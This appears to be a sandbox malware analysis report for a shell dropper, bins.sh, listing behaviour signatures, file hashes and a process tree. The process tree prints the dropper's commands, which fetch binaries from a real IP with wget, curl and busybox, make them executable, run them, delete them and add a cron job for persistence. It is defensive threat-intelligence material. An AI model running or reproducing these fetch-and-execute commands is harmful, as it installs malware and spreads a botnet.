Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21-11-2024 08:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    dc0ce8a1a92fcd65e74d86d4f034507f

  • SHA1

    6c5ae4976fa6a4f05d607b9e9ada4f44288bea0a

  • SHA256

    9b575416eef5a3be461806b57cc99efdf999c9f6f07c6367d6dfb214637e4607

  • SHA512

    a920736e0bbea5c3db7143178398c9cb41e7f89962c0151dbdd8dbf6cda5c5f8c86d757abcde638eda555f1516b54ace20ec0380ff85e32d1616641ef53cd643

  • SSDEEP

    192:mTXeYIJ7pJK7z3hrPwDHn08beSg7v727rPJy+MksWWeSkarPLrPZy+KksWAeS1r9:1ebOlR

Score
9/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Contacts a large (1976) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:658
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:661
        • /usr/bin/wget
          wget http://87.120.125.191/bins/m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
          • Writes file to tmp directory
          PID:667
        • /usr/bin/curl
          curl -O http://87.120.125.191/bins/m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:674
        • /bin/busybox
          /bin/busybox wget http://87.120.125.191/bins/m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
          • Writes file to tmp directory
          PID:683
        • /bin/chmod
          chmod 777 m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
          • File and Directory Permissions Modification
          PID:686
        • /tmp/m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          ./m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
          • Executes dropped EXE
          PID:687
        • /bin/rm
          rm m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
          2⤵
            PID:690
          • /usr/bin/wget
            wget http://87.120.125.191/bins/0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            2⤵
            • Writes file to tmp directory
            PID:691
          • /usr/bin/curl
            curl -O http://87.120.125.191/bins/0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:695
          • /bin/busybox
            /bin/busybox wget http://87.120.125.191/bins/0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            2⤵
            • Writes file to tmp directory
            PID:697
          • /bin/chmod
            chmod 777 0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            2⤵
            • File and Directory Permissions Modification
            PID:698
          • /tmp/0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            ./0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
            2⤵
            • Executes dropped EXE
            • Renames itself
            • Reads runtime system information
            PID:699
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:701
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:702
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:703
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:704
                • /bin/rm
                  rm 0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
                  2⤵
                    PID:706
                  • /usr/bin/wget
                    wget http://87.120.125.191/bins/8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                    2⤵
                      PID:709
                    • /usr/bin/curl
                      curl -O http://87.120.125.191/bins/8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                      2⤵
                        PID:710
                      • /bin/busybox
                        /bin/busybox wget http://87.120.125.191/bins/8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                        2⤵
                        • Writes file to tmp directory
                        PID:791
                      • /bin/chmod
                        chmod 777 8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                        2⤵
                        • File and Directory Permissions Modification
                        PID:792
                      • /tmp/8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                        ./8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                        2⤵
                        • Executes dropped EXE
                        PID:793
                      • /bin/rm
                        rm 8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                        2⤵
                          PID:794
                        • /usr/bin/wget
                          wget http://87.120.125.191/bins/4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                          2⤵
                            PID:795
                          • /usr/bin/curl
                            curl -O http://87.120.125.191/bins/4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                            2⤵
                              PID:796
                            • /bin/busybox
                              /bin/busybox wget http://87.120.125.191/bins/4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                              2⤵
                              • Writes file to tmp directory
                              PID:797
                            • /bin/chmod
                              chmod 777 4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                              2⤵
                              • File and Directory Permissions Modification
                              PID:798
                            • /tmp/4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                              ./4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                              2⤵
                              • Executes dropped EXE
                              PID:799
                            • /bin/rm
                              rm 4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                              2⤵
                                PID:800
                              • /usr/bin/wget
                                wget http://87.120.125.191/bins/hCTrg6qYjmivTVNga7bLfIKLG9n5cHjnH7
                                2⤵
                                  PID:801

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /tmp/0yfWw404qIDxnke9uwoNXxgUfHW5E9qRG4
                                Filesize

                                177KB

                                MD5

                                786d75a158fe731feca3880f436082c0

                                SHA1

                                79ea2734e43d00cdeabed5586b2c1994d02aef3e

                                SHA256

                                5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                                SHA512

                                7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                                Download Submit

                              • /tmp/4YwU6NyJaGbKKHzGFHvqNuMwPWOMZB9RMN
                                Filesize

                                122KB

                                MD5

                                cd3d4b9c643e5b473fb4d88ed05f0716

                                SHA1

                                64ee7a97418583d759eaea8000890cc3bae1b5f4

                                SHA256

                                0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                                SHA512

                                164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                                Download Submit

                              • /tmp/8as9BCSUZ6kCWk7oQihJOoMYzmSMRLD0Bs
                                Filesize

                                141KB

                                MD5

                                3ca8decdb1e52c423c521bfff02ac200

                                SHA1

                                8621ecd6807109b8541912ad9e134f6fb49bfd48

                                SHA256

                                dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                                SHA512

                                b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                                Download Submit

                              • /tmp/m6p93bbJaS6x4yMrzqOvx71GPFSL5YorKu
                                Filesize

                                98KB

                                MD5

                                5141342d0df8699fa32a6b066a0c592e

                                SHA1

                                8157673225bd5182f16215e2aa823a25ca2d4fbc

                                SHA256

                                54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                                SHA512

                                d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                                Download Submit

                              • /var/spool/cron/crontabs/tmp.Nz8F9n
                                Filesize

                                210B

                                MD5

                                bf23dda81b7f402077466b91ac29be99

                                SHA1

                                dab0f0c66981590af012e8095cb5598e1bad3554

                                SHA256

                                58eb2babb1473b4d4a1372ca92702234d8e42016b4e12b9f4f6de95c1b04afe9

                                SHA512

                                a4a72aeb2defd87bae7aeb3901e1196b5a67836e011069edd059cb680803feadac05f88ef4d41dfda8981ced5819996c1b1889989ca1a7a2fb34d380d5f2a833

                                Download Submit